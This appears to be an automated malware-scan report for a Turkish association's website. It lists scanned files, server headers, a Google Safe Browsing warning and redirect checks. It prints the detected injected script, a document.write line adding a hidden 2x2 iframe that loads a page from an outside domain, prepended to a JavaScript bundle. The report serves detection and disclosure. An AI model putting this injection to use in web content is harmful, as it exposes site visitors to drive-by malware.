Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=girisimcilerdernegi.org
Result: The website is marked by Google as suspicious - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://girisimcilerdernegi.org/ | 200 OK Content-Length: 31438 Content-Type: text/html | clean |
http://girisimcilerdernegi.org/templates/bt_arise/js/jquery-1.7.1.min.js | 200 OK Content-Length: 93889 Content-Type: application/javascript | clean |
http://girisimcilerdernegi.org/index.php?jat3action=gzip&jat3type=js&jat3file=t3-assets%2Fjs_60370.js | 200 OK Content-Length: 111066 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://fernandoescobar.cl/cazd.html?j=3257280></iframe>');
(function(){this.MooTools={version:"1.4.5",build:"ab8ea8824dc3b24b6666867a2c4ed58ebb762cf0"};var e=this.typeOf=function(i){if(i==null){return"null";}if(i.$family!=null){return i.$family(); }if(i.nodeName){if(i.nodeType==1){return"element";}if(i.nodeType==3){return(/\S/).test(i.nodeValue)?"textnode":"whitespace"; !1):this.asset},string:function(a){return a}});SqueezeBox.handlers.url=SqueezeBox.handlers.ajax;SqueezeBox.parsers.url=SqueezeBox.parsers.ajax;SqueezeBox.parsers.adopt=SqueezeBox.parsers.clone;
Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://fernandoescobar.cl/cazd.html?j=3257280
<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://fernandoescobar.cl/cazd.html?j=3257280>
http://girisimcilerdernegi.org//ajax.googleapis.com/ajax/libs/jquery/1.8/jquery.min.js/ | 404 Not Found Content-Length: 440 Content-Type: text/html | clean |
http://girisimcilerdernegi.org/test404page.js | 404 Not Found Content-Length: 440 Content-Type: text/html | clean |
http://girisimcilerdernegi.org/index.php?jat3action=gzip&jat3type=js&jat3file=t3-assets%2Fjs_31274.js | 200 OK Content-Length: 276604 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: girisimcilerdernegi.org
Result:
HTTP/1.1 200 OK
Cache-Control: private
Cache-Control: no-cache
Connection: close
Date: Tue, 08 Jul 2014 09:22:44 GMT
Pragma: no-cache
Server: LiteSpeed
Content-Type: text/html; charset=utf-8
Expires:
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 5040a3ddd2fd88f0cc4b1627e633c5f7=019cdffbb80606c3dc3dbc6825f2d3dd; path=/
Set-Cookie: bt_arise_tpl=bt_arise; expires=Sun, 28-Jun-2015 09:22:43 GMT; path=/
X-Powered-By: PHP/5.3.27
Second query (visit from search engine):
GET / HTTP/1.1
Host: girisimcilerdernegi.org
Referer: http://www.google.com/search?q=girisimcilerdernegi.org
Result:
The result is similar to the first query. There are no suspicious redirects found.